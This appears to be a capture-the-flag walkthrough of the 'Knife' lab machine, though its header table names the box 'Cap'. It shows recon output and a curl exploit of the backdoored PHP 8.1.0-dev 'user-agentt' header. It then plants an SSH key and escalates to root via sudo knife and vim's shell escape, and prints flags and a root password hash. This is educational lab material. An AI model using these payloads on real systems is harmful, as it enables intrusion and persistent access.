Name | Cap | |
Difficulty | Easy | |
Release Date | 2021-05-22 | |
Retired Date | <don’t know> | |
IP Address | 10.10.10.242 | |
OS | Linux | |
Points | 20 |
The WalkThrough is protected with the root user’s password hash for as long as the box is active. For any doubt on what to insert here check my How to Unlock WalkThroughs.
foothold
For our initial foothold we’re gonna start with nmap
and then go on from there.
$ nmap -p- -A knife.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-30 21:47 WEST
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.055s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds
Not much running on this box. Let’s check out the website.
Not much to see here. No links, no hidden code on the page source, nothing, not even a little hint on what the site may be based on. Let’s just fire gobuster
and look for some hidden paths.
$ gobuster dir -u http://10.10.10.242 -w /usr/share/dirb/big.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.242
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/05/31 10:54:04 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.txt (Status: 403)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/05/31 10:59:52 Finished
===============================================================
Wait, nothing in here too π€?! This is getting weird by the minute. So, it is running php. Let’s try to get all the versions from the software stack and search for some vulnerabilities.
From the nmap
result we get this two versions:
- ssh: OpenSSH 8.2p1
- apache: Apache httpd 2.4.41
But out of curiosity, let’s find the php version too:
$ curl -v 10.10.10.242 -s | grep -i php
* Trying 10.10.10.242:80...
* Connected to 10.10.10.242 (10.10.10.242) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.242
> User-Agent: curl/7.76.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 31 May 2021 10:17:20 GMT
< Server: Apache/2.4.41 (Ubuntu)
< X-Powered-By: PHP/8.1.0-dev
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [3827 bytes data]
* Connection #0 to host 10.10.10.242 left intact
PHP 8.1.0-dev it is. Now wait a minute! A -dev version running on a server? Let me just google that for a second.
Ok, that explains it π. After checking what vulnerability it was, I remembered reading it on the news. Busically, some PHP dev’s accounts were compromised and 2 commits were made to PHP’s git repo that added a backdoor to the code. Basically, there was a special HTTP header called user-agentt
(notice the double t), and if that header was defined and the contents started with “zerodium”, everything else was PHP eval
ed, meaning, easy remote code execution.
This can be easily exploited with a simple curl
command:
$ curl 10.10.10.242 -s -H "user-agentt: zerodiumsystem('whoami');" | sed "/<\!DOCTYPE html>/q"
james
<!DOCTYPE html>
There we go, as I said, easy code execution. Let’s just add our ssh public key to the authorized_keys
file of the user james
so we get our foothold.
$ curl 10.10.10.242 -s -H "user-agentt: zerodiumsystem('echo ssh-ed25519 <TRIMMED_OUT> r3pek >> /home/james/.ssh/authorized_keys');" | sed "/<\!DOCTYPE html>/q"
<!DOCTYPE html>
$ ssh james@10.10.10.242
The authenticity of host '10.10.10.242 (10.10.10.242)' can't be established.
ED25519 key fingerprint is SHA256:U3tuGrGxSv//jAzSQDRiUNlQnE6LWwounrcc2Bd0qC4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.242' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-72-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 31 May 2021 10:36:11 AM UTC
System load: 0.11
Usage of /: 50.2% of 9.72GB
Memory usage: 66%
Swap usage: 0%
Processes: 343
Users logged in: 0
IPv4 address for ens160: 10.10.10.242
IPv6 address for ens160: dead:beef::250:56ff:feb9:1320
18 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
james@knife:~$
And there we have it, our foothold.
user flag
james
is such a nice guy that he ran the webserver for us, so luckily getting the user flag is just a matter of reading the user.txt
file π
james@knife:~$ cat user.txt
c5d00ebe8c38644b681ca090057d67ca
root flag
For the root
flag we’re gonna start with checking which commands we can run as root:
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Ok, we can run knife
(I didn’t know what it was, but googling it turns out it’s a Chef management tool).
This tool has lots of options but one of its parameters caught my eye:
james@knife:~$ knife -h
Chef Infra Client: 16.10.8
Docs: https://docs.chef.io/workstation/knife/
Patents: https://www.chef.io/patents
Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.
It has an --editor
parameter to specify what editor you want to use when editing some files. Immediately I knew what to do, just had to find a command that opened up the editor, which in my case is going be vim
, and use vim
’s “run command” (:!<command>
) to run a shell as root
.
After trying a few commands that should pop up an editor (I never used Chef, so I’m kind of walking blind here), I found one that works:
james@knife:~$ sudo knife user edit support --editor=vim
vim
pops up so we can edit the support
user, and that’s where we execute our “magic” π. Just typing :!bash
opens up a root
shell:
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# cat root.txt
effb0de0072f99457437560b9af83025
root@knife:~#
Mission accomplished πͺ!
root password hash
$6$LCKz7Uz/FuWPPJ6o$LaOquetpLJIhOzr7YwJzFPX4NdDDHokHtUz.k4S1.CY7D/ECYVfP4Q5eS43/PMtsOa5up1ThgjB3.xUZsHyHA1